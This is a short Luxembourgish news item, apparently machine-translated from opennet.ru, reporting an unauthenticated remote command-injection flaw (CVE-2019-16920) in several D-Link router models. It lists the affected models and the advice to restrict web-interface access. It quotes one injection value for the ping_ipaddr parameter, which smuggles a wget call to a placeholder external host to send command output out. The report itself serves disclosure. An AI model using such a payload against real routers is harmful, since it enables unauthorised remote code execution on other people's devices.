Remote exploitable Schwachstelle an D-Link Router

An D-Link Wireless Router identifizéiert geféierlech Schwachstelle (CVE-2019-16920), wat Iech erlaabt de Code op der Apparat Säit op afstand auszeféieren andeems Dir eng speziell Ufro un den "ping_test" Handler schéckt, zougänglech ouni Authentifikatioun.

Interessanterweis, laut Firmware Entwéckler, soll den Uruff "ping_test" nëmmen no der Authentifikatioun ausgeführt ginn, awer an der Realitéit gëtt et op jidde Fall genannt, onofhängeg vun der Umeldung op de Webinterface. Besonnesch, wann Dir op de Application_sec.cgi Skript zougitt an de Parameter "action=ping_test" passéiert, gëtt de Skript op d'Authentifikatiounssäit ëmgeleet, awer gläichzäiteg mécht d'Aktioun mat ping_test assoziéiert. Fir de Code auszeféieren, gouf eng aner Schwachstelle am ping_test selwer benotzt, deen de Ping-Utility nennt ouni richteg d'Korrektheet vun der IP Adress ze kontrolléieren déi fir Tester geschéckt gëtt. Zum Beispill, fir d'wget Utility ze ruffen an d'Resultater vum Kommando "Echo 1234" op en externen Host ze transferéieren, gitt just de Parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Remote exploitable Schwachstelle an D-Link Router

D'Präsenz vun der Schwachstelle gouf offiziell an de folgende Modeller bestätegt:

  • DIR-655 mat Firmware 3.02b05 oder méi al;
  • DIR-866L mat Firmware 1.03b04 oder méi al;
  • DIR-1565 mat Firmware 1.01 oder méi al;
  • DIR-652 (keng Informatioun iwwer problematesch Firmware Versioune gëtt geliwwert)

D'Ënnerstëtzungsperiod fir dës Modeller ass scho ofgelaf, also D-Link behaapt huet, déi keng Updates fir si verëffentlecht fir d'Schwachheet ze eliminéieren, recommandéiert se net ze benotzen a beréit se mat neien Apparater z'ersetzen. Als Sécherheetsléisung kënnt Dir den Zougang zum Webinterface nëmmen op vertraut IP Adressen limitéieren.

Et gouf spéider entdeckt datt d'Schwachheet och war beaflosst Modeller DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 an DIR-825, Pläng fir Updates fir déi nach net bekannt sinn.

Source: opennet.ru

Setzt e Commentaire